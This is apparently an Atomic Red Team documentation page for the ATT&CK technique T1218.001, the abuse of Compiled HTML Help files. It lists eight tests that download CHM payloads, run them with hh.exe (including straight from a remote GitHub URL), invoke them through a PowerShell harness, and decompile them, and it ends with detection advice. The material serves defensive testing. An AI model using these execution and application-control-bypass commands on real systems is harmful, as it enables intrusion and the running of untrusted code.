Ctrl+K

T1218.001 - Compiled HTML File

Contents

T1218.001 - Compiled HTML File#

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

Atomic Tests#

Atomic Test #1 - Compiled HTML Help Local Payload#

Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The payload must exist on disk at specified location (#{local_chm_file})#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"


Invoke-AtomicTest T1218.001 -TestNumbers 1 -GetPreReqs

Attack Commands: Run with command_prompt#

hh.exe "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"

Invoke-AtomicTest T1218.001 -TestNumbers 1

Atomic Test #2 - Compiled HTML Help Remote PayloadUses hh.exe to execute a remote compiled HTML Help payload.#

Upon execution displays an error saying the file cannot be open Supported Platforms: windows#### Attack Commands: Run with command_prompt

hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm

Invoke-AtomicTest T1218.001 -TestNumbers 2

Atomic Test #3 - Invoke CHM with default Shortcut Command Execution#

Executes a CHM file with the default Shortcut Command method. Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1218.001 -TestNumbers 3 -GetPreReqs

Attack Commands: Run with powershell#

Invoke-ATHCompiledHelp -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm```

Invoke-AtomicTest T1218.001 -TestNumbers 3

Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler#

Executes a CHM file with the ITS protocol handler. Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1218.001 -TestNumbers 4 -GetPreReqs

Attack Commands: Run with powershell#

Invoke-ATHCompiledHelp -InfoTechStorageHandler its -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm```

Invoke-AtomicTest T1218.001 -TestNumbers 4

Atomic Test #5 - Invoke CHM Simulate Double click#

Executes a CHM file simulating a user double click. Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1218.001 -TestNumbers 5 -GetPreReqs

Attack Commands: Run with powershell#

Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath Test.chm```

Invoke-AtomicTest T1218.001 -TestNumbers 5

Atomic Test #6 - Invoke CHM with Script Engine and Help Topic#

Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1218.001 -TestNumbers 6 -GetPreReqs

Attack Commands: Run with powershell#

Invoke-ATHCompiledHelp -ScriptEngine JScript -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm```

Invoke-AtomicTest T1218.001 -TestNumbers 6

Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic#

Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1218.001 -TestNumbers 7 -GetPreReqs

Attack Commands: Run with powershell#

Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm```

Invoke-AtomicTest T1218.001 -TestNumbers 7

Atomic Test #8 - Decompile Local CHM File#

Uses hh.exe to decompile a local compiled HTML Help file. Upon successful execution the chm file will decompile to disk. Reference:https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The payload must exist on disk at specified location (#{local_chm_file})#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"


Invoke-AtomicTest T1218.001 -TestNumbers 8 -GetPreReqs

Attack Commands: Run with command_prompt#

hh.exe -decompile %temp% "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"

Invoke-AtomicTest T1218.001 -TestNumbers 8

Cleanup:#

del %temp%\T1218.001.html >nul 2>&1

Invoke-AtomicTest T1218.001 -TestNumbers 8 -Cleanup

Detection#

Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.

Monitor presence and use of CHM files, especially if they are not typically used within an environment.

Contents